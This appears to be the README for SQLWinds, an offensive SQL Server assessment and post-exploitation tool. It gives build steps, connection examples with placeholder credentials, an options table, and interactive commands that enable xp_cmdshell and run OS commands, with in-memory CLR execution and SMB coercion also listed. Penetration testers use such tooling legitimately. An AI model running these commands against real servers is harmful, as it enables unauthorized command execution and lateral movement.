
SQLWinds - SQL Server Security Assessment & Post-Exploitation Toolkit
SQL Security Assessment & Post-Exploitation Toolkit
SQLWinds is a command-line tool for security testing and exploiting Microsoft SQL Server. It provides an interactive environment to deeply analyze servers, escalate privileges, execute attacks, and pivot through networks all with specialized commands for tasks like in-memory code execution and SCCM database exploration.
Quick Links:
--integrated), and Kerberos delegation (--kerberos with --user/--pass).xp_cmdshell, OLE Automation Procedures (sp_oacreate), and CLR integration.:memclr).:unc_smb).xp_regread.The repository includes a build.bat script for easy compilation on Windows:
.\build.bat
The compiled SQLWinds.exe executable will be placed in the bin\Release\ directory.
git clone https://github.com/blue0x1/sqlwinds.git
cd sqlwinds
msbuild SQLWinds.sln /p:Configuration=Release
# SQL Authentication
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123
# Windows Authentication (Current User Context)
SQLWinds.exe --server sql01.corp.local --integrated
# Kerberos Delegation (with provided credentials)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!
# Connect and run a single command
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"
| Option | Description |
|---|---|
--server | Target server (IP, hostname, instance). Required. |
--user, --pass | Credentials for SQL or Windows auth. |
--integrated | Use current Windows token for authentication. |
--kerberos | Use Kerberos authentication flow. |
--spn-check | Check AD for SPNs for the target host. |
--run-cmd "<SQL>" | Execute a single SQL command and exit. |
--run-file file.sql | Execute a SQL script from a file and exit. |
--info | Gather and display extensive server information. |
--getinstance | Discover SQL instances in the domain and exit. |
--list-dbs | List databases and exit. |
--security-audit | Perform security audit and exit. |
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help